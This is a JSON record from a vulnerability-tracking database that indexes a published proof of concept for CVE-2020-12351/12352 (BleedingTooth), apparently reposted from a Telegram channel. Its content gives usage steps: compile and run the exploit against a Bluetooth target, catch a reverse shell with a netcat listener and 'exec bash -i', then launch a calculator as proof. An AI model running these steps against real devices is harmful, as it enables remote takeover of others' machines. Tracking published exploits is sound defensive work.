{"uuid": "4e5dc24f-26ce-44e9-9990-e063c8b76952", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-12351", "type": "published-proof-of-concept", "source": "https://t.me/indoghostsec/4628", "content": "BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution\nt.me/indoghostsec\n\nThis Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352.\n\nUsage:\n\n$ gcc -o exploit exploit.c -lbluetooth\nand execute it as:\n\n$ sudo ./exploit target_mac source_ip source_port\nIn another terminal, run:\n\n$ nc -lvp 1337\nexec bash -i 2>&0 1>&0\nIf successful, a calc can be spawned with:\n\nexport XAUTHORITY=/run/user/1000/gdm/Xauthority\nexport DISPLAY=:0\ngnome-calculator\nThis Proof-Of-Concept has been tested against a Dell XPS 15 running Ubuntu 20.04.1 LTS with:\n\n5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\nThe success rate of the exploit is estimated at 80%.", "creation_timestamp": "2021-04-07T17:47:27.000000Z"}